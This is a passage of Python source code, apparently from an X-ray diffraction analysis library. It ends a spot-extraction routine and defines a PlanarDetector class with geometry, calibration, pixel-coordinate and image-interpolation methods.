maybe change these to nan to not fuck up writer\n peak_id = -999\n sum_int = np.nan\n max_int = np.nan\n meas_angs = np.nan*np.ones(3)\n meas_xy = np.nan*np.ones(2)\n\n # quick check for intensity\n contains_signal = False\n patch_data_raw = []\n for i_frame in frame_indices:\n tmp = ome_imgser[i_frame][ijs[0], ijs[1]]\n contains_signal = contains_signal or np.any(\n tmp > threshold\n )\n patch_data_raw.append(tmp)\n pass\n patch_data_raw = np.stack(patch_data_raw, axis=0)\n compl.append(contains_signal)\n\n if contains_signal:\n # initialize patch data array for intensities\n if interp.lower() == 'bilinear':\n patch_data = np.zeros(\n (len(frame_indices), prows, pcols))\n for i, i_frame in enumerate(frame_indices):\n patch_data[i] = \\\n panel.interpolate_bilinear(\n xy_eval,\n ome_imgser[i_frame],\n pad_with_nans=False\n ).reshape(prows, pcols) # * nrm_fac\n elif interp.lower() == 'nearest':\n patch_data = patch_data_raw # * nrm_fac\n else:\n msg = \"interpolation option \" + \\\n \"'%s' not understood\"\n raise(RuntimeError, msg % interp)\n\n # now have interpolated patch data...\n labels, num_peaks = ndimage.label(\n patch_data > threshold, structure=label_struct\n )\n slabels = np.arange(1, num_peaks + 1)\n\n if num_peaks > 0:\n peak_id = iRefl\n coms = np.array(\n ndimage.center_of_mass(\n patch_data,\n labels=labels,\n index=slabels\n )\n )\n if num_peaks > 1:\n center = np.r_[patch_data.shape]*0.5\n center_t = np.tile(center, (num_peaks, 1))\n com_diff = coms - center_t\n closest_peak_idx = np.argmin(\n np.sum(com_diff**2, axis=1)\n )\n else:\n closest_peak_idx = 0\n pass # end multipeak conditional\n coms = coms[closest_peak_idx]\n # meas_omes = \\\n # ome_edges[0] + (0.5 + coms[0])*delta_ome\n meas_omes = \\\n ome_eval[0] + coms[0]*delta_ome\n meas_angs = np.hstack(\n [tth_edges[0] + (0.5 + coms[2])*delta_tth,\n eta_edges[0] + (0.5 + coms[1])*delta_eta,\n mapAngle(\n np.radians(meas_omes), ome_period\n )\n ]\n )\n\n # intensities\n # - summed is 'integrated' over interpolated\n # data\n # - max is max of raw input data\n sum_int = np.sum(\n patch_data[\n labels == slabels[closest_peak_idx]\n ]\n )\n max_int = np.max(\n patch_data_raw[\n labels == slabels[closest_peak_idx]\n ]\n )\n # ???: Should this only use labeled pixels?\n # Those are segmented from interpolated data,\n # not raw; likely ok in most cases.\n\n # need MEASURED xy coords\n gvec_c = anglesToGVec(\n meas_angs,\n chi=self.chi,\n rMat_c=rMat_c,\n bHat_l=self.beam_vector)\n rMat_s = makeOscillRotMat(\n [self.chi, meas_angs[2]]\n )\n meas_xy = gvecToDetectorXY(\n gvec_c,\n panel.rmat, rMat_s, rMat_c,\n panel.tvec, self.tvec, tVec_c,\n beamVec=self.beam_vector)\n if panel.distortion is not None:\n meas_xy = panel.distortion.apply_inverse(\n np.atleast_2d(meas_xy)\n ).flatten()\n pass\n # FIXME: why is this suddenly necessary???\n meas_xy = meas_xy.squeeze()\n pass # end num_peaks > 0\n else:\n patch_data = patch_data_raw\n pass # end contains_signal\n # write output\n if filename is not None:\n if output_format.lower() == 'text':\n writer.dump_patch(\n peak_id, hkl_id, hkl, sum_int, max_int,\n ang_centers[i_pt], meas_angs,\n xy_centers[i_pt], meas_xy)\n elif output_format.lower() == 'hdf5':\n xyc_arr = xy_eval.reshape(\n prows, pcols, 2\n ).transpose(2, 0, 1)\n writer.dump_patch(\n detector_id, iRefl, peak_id, hkl_id, hkl,\n tth_edges, eta_edges, np.radians(ome_eval),\n xyc_arr, ijs, frame_indices, patch_data,\n ang_centers[i_pt], xy_centers[i_pt],\n meas_angs, meas_xy)\n pass # end conditional on write output\n pass # 
end conditional on check only\n\n if return_spot_list:\n # Full output\n xyc_arr = xy_eval.reshape(\n prows, pcols, 2\n ).transpose(2, 0, 1)\n _patch_output = [\n detector_id, iRefl, peak_id, hkl_id, hkl,\n tth_edges, eta_edges, np.radians(ome_eval),\n xyc_arr, ijs, frame_indices, patch_data,\n ang_centers[i_pt], xy_centers[i_pt],\n meas_angs, meas_xy\n ]\n else:\n # Trimmed output\n _patch_output = [\n peak_id, hkl_id, hkl, sum_int, max_int,\n ang_centers[i_pt], meas_angs, meas_xy\n ]\n patch_output.append(_patch_output)\n iRefl += 1\n pass # end patch conditional\n pass # end patch loop\n output[detector_id] = patch_output\n if filename is not None and output_format.lower() == 'text':\n writer.close()\n pass # end detector loop\n if filename is not None and output_format.lower() == 'hdf5':\n writer.close()\n return compl, output\n\n \"\"\"def fit_grain(self, grain_params, data_dir='results'):\"\"\"\n\n pass # end class: HEDMInstrument\n\n\nclass PlanarDetector(object):\n \"\"\"Base class for 2D planar, rectangular row-column detector\"\"\"\n\n __pixelPitchUnit = 'mm'\n\n def __init__(self,\n rows=2048, cols=2048,\n pixel_size=(0.2, 0.2),\n tvec=np.r_[0., 0., -1000.],\n tilt=ct.zeros_3,\n name='default',\n bvec=ct.beam_vec,\n evec=ct.eta_vec,\n saturation_level=None,\n panel_buffer=None,\n roi=None,\n distortion=None,\n max_workers=max_workers_DFLT):\n \"\"\"\n Instantiate a PlanarDetector object.\n\n Parameters\n ----------\n rows : TYPE, optional\n DESCRIPTION. The default is 2048.\n cols : TYPE, optional\n DESCRIPTION. The default is 2048.\n pixel_size : TYPE, optional\n DESCRIPTION. The default is (0.2, 0.2).\n tvec : TYPE, optional\n DESCRIPTION. The default is np.r_[0., 0., -1000.].\n tilt : TYPE, optional\n DESCRIPTION. The default is ct.zeros_3.\n name : TYPE, optional\n DESCRIPTION. The default is 'default'.\n bvec : TYPE, optional\n DESCRIPTION. The default is ct.beam_vec.\n evec : TYPE, optional\n DESCRIPTION. The default is ct.eta_vec.\n saturation_level : TYPE, optional\n DESCRIPTION. The default is None.\n panel_buffer : TYPE, optional\n If a scalar or len(2) array_like, the interpretation is a border\n in mm. If an array with shape (nrows, ncols), interpretation is a\n boolean with True marking valid pixels. The default is None.\n roi : TYPE, optional\n DESCRIPTION. The default is None.\n distortion : TYPE, optional\n DESCRIPTION. 
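# --- Illustrative sketch: the two panel_buffer conventions -------------------
# The docstring above accepts panel_buffer either as a border in mm or as a
# full boolean pixel mask.  The sizes and values below are hypothetical and
# only illustrate the accepted shapes.
import numpy as np

# 1) scalar / 2-element border in mm: points closer than this to the physical
#    panel edge are treated as off-panel
buffer_mm = np.r_[0.5, 0.5]

# 2) (nrows, ncols) boolean array: True marks valid pixels
rows, cols = 2048, 2048
buffer_mask = np.ones((rows, cols), dtype=bool)
buffer_mask[:10, :] = False    # e.g. exclude the first ten rows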
The default is None.\n\n Returns\n -------\n None.\n\n \"\"\"\n self._name = name\n\n self._rows = rows\n self._cols = cols\n\n self._pixel_size_row = pixel_size[0]\n self._pixel_size_col = pixel_size[1]\n\n self._saturation_level = saturation_level\n\n self._panel_buffer = panel_buffer\n\n self._roi = roi\n\n self._tvec = np.array(tvec).flatten()\n self._tilt = np.array(tilt).flatten()\n\n self._bvec = np.array(bvec).flatten()\n self._evec = np.array(evec).flatten()\n\n self._distortion = distortion\n\n self.max_workers = max_workers\n\n #\n # set up calibration parameter list and refinement flags\n #\n # order for a single detector will be\n #\n # [tilt, translation, ]\n dparams = []\n if self._distortion is not None:\n dparams = self._distortion.params\n self._calibration_parameters = np.hstack(\n [self._tilt, self._tvec, dparams]\n )\n self._calibration_flags = np.hstack(\n [panel_calibration_flags_DFLT,\n np.zeros(len(dparams), dtype=bool)]\n )\n return\n\n # detector ID\n @property\n def name(self):\n return self._name\n\n @name.setter\n def name(self, s):\n assert isinstance(s, str), \"requires string input\"\n self._name = s\n\n # properties for physical size of rectangular detector\n @property\n def rows(self):\n return self._rows\n\n @rows.setter\n def rows(self, x):\n assert isinstance(x, int)\n self._rows = x\n\n @property\n def cols(self):\n return self._cols\n\n @cols.setter\n def cols(self, x):\n assert isinstance(x, int)\n self._cols = x\n\n @property\n def pixel_size_row(self):\n return self._pixel_size_row\n\n @pixel_size_row.setter\n def pixel_size_row(self, x):\n self._pixel_size_row = float(x)\n\n @property\n def pixel_size_col(self):\n return self._pixel_size_col\n\n @pixel_size_col.setter\n def pixel_size_col(self, x):\n self._pixel_size_col = float(x)\n\n @property\n def pixel_area(self):\n return self.pixel_size_row * self.pixel_size_col\n\n @property\n def saturation_level(self):\n return self._saturation_level\n\n @saturation_level.setter\n def saturation_level(self, x):\n if x is not None:\n assert np.isreal(x)\n self._saturation_level = x\n\n @property\n def panel_buffer(self):\n return self._panel_buffer\n\n @panel_buffer.setter\n def panel_buffer(self, x):\n \"\"\"if not None, a buffer in mm (x, y)\"\"\"\n if x is not None:\n assert len(x) == 2 or x.ndim == 2\n self._panel_buffer = x\n\n @property\n def roi(self):\n return self._roi\n\n @roi.setter\n def roi(self, vertex_array):\n \"\"\"\n vertex array must be\n\n [[r0, c0], [r1, c1], ..., [rn, cn]]\n\n and have len >= 3\n\n does NOT need to repeat start vertex for closure\n \"\"\"\n if vertex_array is not None:\n assert len(vertex_array) >= 3\n self._roi = vertex_array\n\n @property\n def row_dim(self):\n return self.rows * self.pixel_size_row\n\n @property\n def col_dim(self):\n return self.cols * self.pixel_size_col\n\n @property\n def row_pixel_vec(self):\n return self.pixel_size_row*(0.5*(self.rows-1)-np.arange(self.rows))\n\n @property\n def row_edge_vec(self):\n return _row_edge_vec(self.rows, self.pixel_size_row)\n\n @property\n def col_pixel_vec(self):\n return self.pixel_size_col*(np.arange(self.cols)-0.5*(self.cols-1))\n\n @property\n def col_edge_vec(self):\n return _col_edge_vec(self.cols, self.pixel_size_col)\n\n @property\n def corner_ul(self):\n return np.r_[-0.5 * self.col_dim, 0.5 * self.row_dim]\n\n @property\n def corner_ll(self):\n return np.r_[-0.5 * self.col_dim, -0.5 * self.row_dim]\n\n @property\n def corner_lr(self):\n return np.r_[0.5 * self.col_dim, -0.5 * self.row_dim]\n\n 
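# --- Illustrative sketch: pixel-center coordinate vectors --------------------
# row_pixel_vec / col_pixel_vec above define a center-based detector frame:
# row coordinates decrease as the row index increases (row 0 sits at +y), and
# column coordinates increase with the column index (col 0 sits at -x).  A
# tiny hypothetical 4x3 panel makes the convention explicit.
import numpy as np

rows, cols = 4, 3
psr, psc = 0.2, 0.2     # hypothetical pixel sizes in mm

row_pixel_vec = psr * (0.5 * (rows - 1) - np.arange(rows))
col_pixel_vec = psc * (np.arange(cols) - 0.5 * (cols - 1))

print(row_pixel_vec)    # [ 0.3  0.1 -0.1 -0.3]
print(col_pixel_vec)    # [-0.2  0.   0.2]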
@property\n def corner_ur(self):\n return np.r_[0.5 * self.col_dim, 0.5 * self.row_dim]\n\n @property\n def shape(self):\n return (self.rows, self.cols)\n\n @property\n def tvec(self):\n return self._tvec\n\n @tvec.setter\n def tvec(self, x):\n x = np.array(x).flatten()\n assert len(x) == 3, 'input must have length = 3'\n self._tvec = x\n\n @property\n def tilt(self):\n return self._tilt\n\n @tilt.setter\n def tilt(self, x):\n assert len(x) == 3, 'input must have length = 3'\n self._tilt = np.array(x).squeeze()\n\n @property\n def bvec(self):\n return self._bvec\n\n @bvec.setter\n def bvec(self, x):\n x = np.array(x).flatten()\n assert len(x) == 3 and sum(x*x) > 1-ct.sqrt_epsf, \\\n 'input must have length = 3 and have unit magnitude'\n self._bvec = x\n\n @property\n def evec(self):\n return self._evec\n\n @evec.setter\n def evec(self, x):\n x = np.array(x).flatten()\n assert len(x) == 3 and sum(x*x) > 1-ct.sqrt_epsf, \\\n 'input must have length = 3 and have unit magnitude'\n self._evec = x\n\n @property\n def distortion(self):\n return self._distortion\n\n @distortion.setter\n def distortion(self, x):\n # FIXME: ne to reconcile check with new class type!\n assert len(x) == 2 and hasattr(x[0], '__call__'), \\\n 'distortion must be a tuple: (, params)'\n self._distortion = x\n\n @property\n def rmat(self):\n return makeRotMatOfExpMap(self.tilt)\n\n @property\n def normal(self):\n return self.rmat[:, 2]\n\n @property\n def beam_position(self):\n \"\"\"\n returns the coordinates of the beam in the cartesian detector\n frame {Xd, Yd, Zd}. NaNs if no intersection.\n \"\"\"\n output = np.nan * np.ones(2)\n b_dot_n = np.dot(self.bvec, self.normal)\n if np.logical_and(\n abs(b_dot_n) > ct.sqrt_epsf,\n np.sign(b_dot_n) == -1\n ):\n u = np.dot(self.normal, self.tvec) / b_dot_n\n p2_l = u*self.bvec\n p2_d = np.dot(self.rmat.T, p2_l - self.tvec)\n output = p2_d[:2]\n return output\n\n # ...memoize???\n @property\n def pixel_coords(self):\n pix_i, pix_j = np.meshgrid(\n self.row_pixel_vec, self.col_pixel_vec,\n indexing='ij')\n return pix_i, pix_j\n\n @property\n def pixel_solid_angles(self):\n kwargs = {\n 'rows': self.rows,\n 'cols': self.cols,\n 'pixel_size_row': self.pixel_size_row,\n 'pixel_size_col': self.pixel_size_col,\n 'rmat': self.rmat,\n 'tvec': self.tvec,\n 'max_workers': self.max_workers,\n }\n return _pixel_solid_angles(**kwargs)\n\n @property\n def calibration_parameters(self):\n #\n # set up calibration parameter list and refinement flags\n #\n # order for a single detector will be\n #\n # [tilt, translation, ]\n dparams = []\n if self.distortion is not None:\n dparams = self.distortion.params\n self._calibration_parameters = np.hstack(\n [self.tilt, self.tvec, dparams]\n )\n return self._calibration_parameters\n\n @property\n def calibration_flags(self):\n return self._calibration_flags\n\n @calibration_flags.setter\n def calibration_flags(self, x):\n x = np.array(x, dtype=bool).flatten()\n if len(x) != len(self._calibration_flags):\n raise RuntimeError(\n \"length of parameter list must be %d; you gave %d\"\n % (len(self._calibration_flags), len(x))\n )\n self._calibration_flags = x\n\n # =========================================================================\n # METHODS\n # =========================================================================\n\n def lorentz_polarization_factor(self, f_hor, f_vert):\n \"\"\"\n Calculated the lorentz polarization factor for every pixel.\n\n Parameters\n ----------\n f_hor : float\n the fraction of horizontal polarization. 
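# --- Illustrative sketch: beam/detector-plane intersection -------------------
# A standalone check of the geometry used by beam_position above.  With the
# panel normal n = rmat[:, 2], an intersection requires b.n < 0; the scale
# along the beam is u = (n.t)/(b.n) and the detector-frame coordinates are
# rmat.T @ (u*b - t).  The untilted panel, tvec and beam vector below are
# hypothetical and should place the beam at the panel center, (0, 0).
import numpy as np

rmat = np.eye(3)                    # untilted panel
tvec = np.r_[0., 0., -1000.]        # panel origin, lab frame (mm)
bvec = np.r_[0., 0., -1.]           # beam propagation direction

normal = rmat[:, 2]
b_dot_n = bvec @ normal             # negative -> beam points at the panel
u = (normal @ tvec) / b_dot_n       # distance along the beam to the plane
p_lab = u * bvec                    # intersection point, lab frame
p_det = rmat.T @ (p_lab - tvec)     # same point in the detector frame
print(p_det[:2])                    # -> [0. 0.]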
for XFELs\n this is close to 1.\n f_vert : TYPE\n the fraction of vertical polarization, which is ~0 for XFELs.\n\n Raises\n ------\n RuntimeError\n DESCRIPTION.\n\n Returns\n -------\n TYPE\n DESCRIPTION.\n\n \"\"\"\n s = f_hor + f_vert\n if np.abs(s - 1) > constants.sqrt_epsf:\n msg = (\"sum of fraction of \"\n \"horizontal and vertical polarizations \"\n \"must be equal to 1.\")\n raise RuntimeError(msg)\n\n if f_hor < 0 or f_vert < 0:\n msg = (\"fraction of polarization in horizontal \"\n \"or vertical directions can't be negative.\")\n raise RuntimeError(msg)\n\n tth, eta = self.pixel_angles()\n args = (tth, eta, f_hor, f_vert)\n\n return _lorentz_polarization_factor(*args)\n\n def config_dict(self, chi=0, tvec=ct.zeros_3,\n beam_energy=beam_energy_DFLT, beam_vector=ct.beam_vec,\n sat_level=None, panel_buffer=None, style='yaml'):\n \"\"\"\n Return a dictionary of detector parameters.\n\n Optional instrument level parameters. This is a convenience function\n to work with the APIs in several functions in xrdutil.\n\n Parameters\n ----------\n chi : float, optional\n DESCRIPTION. The default is 0.\n tvec : array_like (3,), optional\n DESCRIPTION. The default is ct.zeros_3.\n beam_energy : float, optional\n DESCRIPTION. The default is beam_energy_DFLT.\n beam_vector : aray_like (3,), optional\n DESCRIPTION. The default is ct.beam_vec.\n sat_level : scalar, optional\n DESCRIPTION. The default is None.\n panel_buffer : scalar, array_like (2,), optional\n DESCRIPTION. The default is None.\n\n Returns\n -------\n config_dict : dict\n DESCRIPTION.\n\n \"\"\"\n assert style.lower() in ['yaml', 'hdf5'], \\\n \"style must be either 'yaml', or 'hdf5'; you gave '%s'\" % style\n\n config_dict = {}\n\n # =====================================================================\n # DETECTOR PARAMETERS\n # =====================================================================\n # transform and pixels\n #\n # assign local vars; listify if necessary\n tilt = self.tilt\n translation = self.tvec\n if style.lower() == 'yaml':\n tilt = tilt.tolist()\n translation = translation.tolist()\n tvec = tvec.tolist()\n\n det_dict = dict(\n transform=dict(\n tilt=tilt,\n translation=translation,\n ),\n pixels=dict(\n rows=self.rows,\n columns=self.cols,\n size=[self.pixel_size_row, self.pixel_size_col],\n )\n )\n\n # distortion\n if self.distortion is not None:\n dparams = self.distortion.params\n if style.lower() == 'yaml':\n dparams = dparams.tolist()\n dist_d = dict(\n function_name=self.distortion.maptype,\n parameters=dparams\n )\n det_dict['distortion'] = dist_d\n\n # saturation level\n if sat_level is None:\n sat_level = self.saturation_level\n det_dict['saturation_level'] = sat_level\n\n # panel buffer\n if panel_buffer is None:\n # could be non, a 2-element list, or a 2-d array (rows, cols)\n panel_buffer = copy.deepcopy(self.panel_buffer)\n # !!! now we have to do some style-dependent munging of panel_buffer\n if isinstance(panel_buffer, np.ndarray):\n if panel_buffer.ndim == 1:\n assert len(panel_buffer) == 2, \\\n \"length of 1-d buffer must be 2\"\n # if here is a 2-element array\n if style.lower() == 'yaml':\n panel_buffer = panel_buffer.tolist()\n elif panel_buffer.ndim == 2:\n if style.lower() == 'yaml':\n # !!! 
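# --- Illustrative sketch: layout of the config_dict return value -------------
# The method above assembles a nested dict with 'detector', 'oscillation_stage'
# and 'beam' sections.  The values below are hypothetical placeholders; only
# the key layout mirrors the assembly code (a 'distortion' sub-dict is added
# only when the panel has one).
example_config = {
    'detector': {
        'transform': {'tilt': [0., 0., 0.], 'translation': [0., 0., -1000.]},
        'pixels': {'rows': 2048, 'columns': 2048, 'size': [0.2, 0.2]},
        'saturation_level': None,
        'buffer': [0., 0.],
    },
    'oscillation_stage': {'chi': 0.0, 'translation': [0., 0., 0.]},
    'beam': {'energy': 65.0, 'vector': [0., 0., -1.]},
}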
can't practically write array-like buffers to YAML\n # so forced to clobber\n print(\"clobbering panel buffer array in yaml-ready output\")\n panel_buffer = [0., 0.]\n else:\n raise RuntimeError(\n \"panel buffer ndim must be 1 or 2; you specified %d\"\n % panel_buffer.ndmin\n )\n elif panel_buffer is None:\n # still None on self\n if style.lower() == 'hdf5':\n # !!! can't write None to hdf5; substitute with zeros\n panel_buffer = np.r_[0., 0.]\n det_dict['buffer'] = panel_buffer\n\n # =====================================================================\n # SAMPLE STAGE PARAMETERS\n # =====================================================================\n stage_dict = dict(\n chi=chi,\n translation=tvec\n )\n\n # =====================================================================\n # BEAM PARAMETERS\n # =====================================================================\n # !!! make_reflection_patches is still using the vector\n # azim, pola = calc_angles_from_beam_vec(beam_vector)\n # beam_dict = dict(\n # energy=beam_energy,\n # vector=dict(\n # azimuth=azim,\n # polar_angle=pola\n # )\n # )\n beam_dict = dict(\n energy=beam_energy,\n vector=beam_vector\n )\n\n config_dict['detector'] = det_dict\n config_dict['oscillation_stage'] = stage_dict\n config_dict['beam'] = beam_dict\n\n return config_dict\n\n def pixel_angles(self, origin=ct.zeros_3):\n return _pixel_angles(origin, self.pixel_coords, self.distortion,\n self.rmat, self.tvec, self.bvec, self.evec,\n self.rows, self.cols)\n\n def pixel_tth_gradient(self, origin=ct.zeros_3):\n assert len(origin) == 3, \"origin must have 3 elemnts\"\n ptth, _ = self.pixel_angles(origin=origin)\n return np.linalg.norm(np.stack(np.gradient(ptth)), axis=0)\n\n def pixel_eta_gradient(self, origin=ct.zeros_3):\n period = np.r_[0., 2*np.pi]\n assert len(origin) == 3, \"origin must have 3 elemnts\"\n _, peta = self.pixel_angles(origin=origin)\n\n # !!! 
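# --- Illustrative sketch: wrapping eta before taking gradients ---------------
# The row/column loops above re-map each slice of the eta array into a period
# starting at that slice's first value, so the branch cut at +/-pi does not
# inject a spurious 2*pi jump into np.gradient.  wrap() below is a simple
# stand-in for hexrd's mapAngle; the sample angles are hypothetical.
import numpy as np

def wrap(ang, low):
    """Map angles (radians) into [low, low + 2*pi)."""
    return low + np.mod(ang - low, 2.0 * np.pi)

eta_row = np.array([3.10, 3.14, -3.13, -3.09])   # crosses the +/-pi cut
naive_step = np.max(np.abs(np.diff(eta_row)))     # ~6.27, an artificial jump
wrapped = wrap(eta_row, eta_row[0])               # smoothly increasing
true_step = np.max(np.abs(np.diff(wrapped)))      # ~0.04, the physical step
print(naive_step, true_step)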
handle cyclic nature of eta\n rowmap = np.empty_like(peta)\n for i in range(rowmap.shape[0]):\n rowmap[i, :] = mapAngle(\n peta[i, :], peta[i, 0] + period\n )\n\n colmap = np.empty_like(peta)\n for i in range(colmap.shape[1]):\n colmap[:, i] = mapAngle(\n peta[:, i], peta[0, i] + period\n )\n\n peta_grad_row = np.gradient(rowmap)\n peta_grad_col = np.gradient(colmap)\n\n return np.linalg.norm(\n np.stack([peta_grad_col[0], peta_grad_row[1]]),\n axis=0\n )\n\n def cartToPixel(self, xy_det, pixels=False):\n \"\"\"\n Convert vstacked array or list of [x,y] points in the center-based\n cartesian frame {Xd, Yd, Zd} to (i, j) edge-based indices\n\n i is the row index, measured from the upper-left corner\n j is the col index, measured from the upper-left corner\n\n if pixels=True, then (i,j) are integer pixel indices.\n else (i,j) are continuous coords\n \"\"\"\n xy_det = np.atleast_2d(xy_det)\n\n npts = len(xy_det)\n\n tmp_ji = xy_det - np.tile(self.corner_ul, (npts, 1))\n i_pix = -tmp_ji[:, 1] / self.pixel_size_row - 0.5\n j_pix = tmp_ji[:, 0] / self.pixel_size_col - 0.5\n\n ij_det = np.vstack([i_pix, j_pix]).T\n if pixels:\n ij_det = np.array(np.round(ij_det), dtype=int)\n return ij_det\n\n def pixelToCart(self, ij_det):\n \"\"\"\n Convert vstacked array or list of [i,j] pixel indices\n (or UL corner-based points) and convert to (x,y) in the\n cartesian frame {Xd, Yd, Zd}\n \"\"\"\n ij_det = np.atleast_2d(ij_det)\n\n x = (ij_det[:, 1] + 0.5)*self.pixel_size_col\\\n + self.corner_ll[0]\n y = (self.rows - ij_det[:, 0] - 0.5)*self.pixel_size_row\\\n + self.corner_ll[1]\n return np.vstack([x, y]).T\n\n def angularPixelSize(self, xy, rMat_s=None, tVec_s=None, tVec_c=None):\n \"\"\"\n Wraps xrdutil.angularPixelSize\n \"\"\"\n # munge kwargs\n if rMat_s is None:\n rMat_s = ct.identity_3x3\n if tVec_s is None:\n tVec_s = ct.zeros_3x1\n if tVec_c is None:\n tVec_c = ct.zeros_3x1\n\n # call function\n ang_ps = xrdutil.angularPixelSize(\n xy, (self.pixel_size_row, self.pixel_size_col),\n self.rmat, rMat_s,\n self.tvec, tVec_s, tVec_c,\n distortion=self.distortion,\n beamVec=self.bvec, etaVec=self.evec)\n return ang_ps\n\n def clip_to_panel(self, xy, buffer_edges=True):\n \"\"\"\n if self.roi is not None, uses it by default\n\n TODO: check if need shape kwarg\n TODO: optimize ROI search better than list comprehension below\n TODO: panel_buffer can be a 2-d boolean mask, but needs testing\n\n \"\"\"\n xy = np.atleast_2d(xy)\n\n if self.roi is not None:\n ij_crds = self.cartToPixel(xy, pixels=True)\n ii, jj = polygon(self.roi[:, 0], self.roi[:, 1],\n shape=(self.rows, self.cols))\n on_panel_rows = [i in ii for i in ij_crds[:, 0]]\n on_panel_cols = [j in jj for j in ij_crds[:, 1]]\n on_panel = np.logical_and(on_panel_rows, on_panel_cols)\n else:\n xlim = 0.5*self.col_dim\n ylim = 0.5*self.row_dim\n if buffer_edges and self.panel_buffer is not None:\n if self.panel_buffer.ndim == 2:\n pix = self.cartToPixel(xy, pixels=True)\n\n roff = np.logical_or(pix[:, 0] < 0, pix[:, 0] >= self.rows)\n coff = np.logical_or(pix[:, 1] < 0, pix[:, 1] >= self.cols)\n\n idx = np.logical_or(roff, coff)\n\n pix[idx, :] = 0\n\n on_panel = self.panel_buffer[pix[:, 0], pix[:, 1]]\n on_panel[idx] = False\n else:\n xlim -= self.panel_buffer[0]\n ylim -= self.panel_buffer[1]\n on_panel_x = np.logical_and(\n xy[:, 0] >= -xlim, xy[:, 0] <= xlim\n )\n on_panel_y = np.logical_and(\n xy[:, 1] >= -ylim, xy[:, 1] <= ylim\n )\n on_panel = np.logical_and(on_panel_x, on_panel_y)\n elif not buffer_edges or self.panel_buffer is None:\n on_panel_x 
= np.logical_and(\n xy[:, 0] >= -xlim, xy[:, 0] <= xlim\n )\n on_panel_y = np.logical_and(\n xy[:, 1] >= -ylim, xy[:, 1] <= ylim\n )\n on_panel = np.logical_and(on_panel_x, on_panel_y)\n return xy[on_panel, :], on_panel\n\n def cart_to_angles(self, xy_data, rmat_s=None, tvec_s=None, tvec_c=None):\n \"\"\"\n TODO: distortion\n \"\"\"\n if rmat_s is None:\n rmat_s = ct.identity_3x3\n if tvec_s is None:\n tvec_s = ct.zeros_3\n if tvec_c is None:\n tvec_c = ct.zeros_3\n angs, g_vec = detectorXYToGvec(\n xy_data, self.rmat, rmat_s,\n self.tvec, tvec_s, tvec_c,\n beamVec=self.bvec, etaVec=self.evec)\n tth_eta = np.vstack([angs[0], angs[1]]).T\n return tth_eta, g_vec\n\n def angles_to_cart(self, tth_eta,\n rmat_s=None, tvec_s=None,\n rmat_c=None, tvec_c=None):\n \"\"\"\n TODO: distortion\n \"\"\"\n if rmat_s is None:\n rmat_s = ct.identity_3x3\n if tvec_s is None:\n tvec_s = ct.zeros_3\n if rmat_c is None:\n rmat_c = ct.identity_3x3\n if tvec_c is None:\n tvec_c = ct.zeros_3\n # !!! warning, this assumes an rmat_s made from chi, ome pair\n chi = np.arccos(rmat_s[1, 1])\n ome = np.arccos(rmat_s[0, 0])\n\n angs = np.hstack([tth_eta, np.tile(ome, (len(tth_eta), 1))])\n xy_det = gvecToDetectorXY(\n anglesToGVec(angs, bHat_l=self.bvec, eHat_l=self.evec, chi=chi),\n self.rmat, rmat_s, rmat_c,\n self.tvec, tvec_s, tvec_c,\n beamVec=self.bvec)\n return xy_det\n\n def interpolate_nearest(self, xy, img, pad_with_nans=True):\n \"\"\"\n TODO: revisit normalization in here?\n\n \"\"\"\n is_2d = img.ndim == 2\n right_shape = img.shape[0] == self.rows and img.shape[1] == self.cols\n assert is_2d and right_shape,\\\n \"input image must be 2-d with shape (%d, %d)\"\\\n % (self.rows, self.cols)\n\n # initialize output with nans\n if pad_with_nans:\n int_xy = np.nan*np.ones(len(xy))\n else:\n int_xy = np.zeros(len(xy))\n\n # clip away points too close to or off the edges of the detector\n xy_clip, on_panel = self.clip_to_panel(xy, buffer_edges=True)\n\n # get pixel indices of clipped points\n i_src = cellIndices(self.row_pixel_vec, xy_clip[:, 1])\n j_src = cellIndices(self.col_pixel_vec, xy_clip[:, 0])\n\n # next interpolate across cols\n int_vals = img[i_src, j_src]\n int_xy[on_panel] = int_vals\n return int_xy\n\n def interpolate_bilinear(self, xy, img, pad_with_nans=True):\n \"\"\"\n Interpolate an image array at the specified cartesian points.\n\n Parameters\n ----------\n xy : array_like, (n, 2)\n Array of cartesian coordinates in the image plane at which\n to evaluate intensity.\n img : array_like\n 2-dimensional image array.\n pad_with_nans : bool, optional\n Toggle for assigning NaN to points that fall off the detector.\n The default is True.\n\n Returns\n -------\n int_xy : array_like, (n,)\n The array of interpolated intensities at each of the n input\n coordinates.\n\n Notes\n -----\n TODO: revisit normalization in here?\n \"\"\"\n\n is_2d = img.ndim == 2\n right_shape = img.shape[0] == self.rows and img.shape[1] == self.cols\n assert is_2d and right_shape,\\\n \"input image must be 2-d with shape (%d, %d)\"\\\n % (self.rows, self.cols)\n\n # initialize output with nans\n if pad_with_nans:\n int_xy = np.nan*np.ones(len(xy))\n else:\n int_xy = np.zeros(len(xy))\n\n # clip away points too close to or off the edges of the detector\n xy_clip, on_panel = self.clip_to_panel(xy, buffer_edges=True)\n\n # grab fractional pixel indices of clipped points\n ij_frac = self.cartToPixel(xy_clip)\n\n # get floors/ceils from array of pixel _centers_\n # and fix indices running off the pixel centers\n # !!! 
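# --- Illustrative sketch: the bilinear weighting scheme ----------------------
# A standalone version of the floor/ceil weighting implemented in
# interpolate_bilinear: blend the four surrounding pixel values with weights
# given by the fractional distances.  The toy image and query point are
# hypothetical; the linear test image makes the expected answer obvious.
import numpy as np

img = np.arange(12, dtype=float).reshape(3, 4)    # img[i, j] = 4*i + j
i_frac, j_frac = 1.25, 2.5                        # fractional (row, col) coords

i0, j0 = int(np.floor(i_frac)), int(np.floor(j_frac))
i1, j1 = i0 + 1, j0 + 1
# interpolate along columns on the two bracketing rows...
row_lo = (j1 - j_frac) * img[i0, j0] + (j_frac - j0) * img[i0, j1]
row_hi = (j1 - j_frac) * img[i1, j0] + (j_frac - j0) * img[i1, j1]
# ...then blend the two rows
val = (i1 - i_frac) * row_lo + (i_frac - i0) * row_hi
print(val)    # 7.5 == 4*1.25 + 2.5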
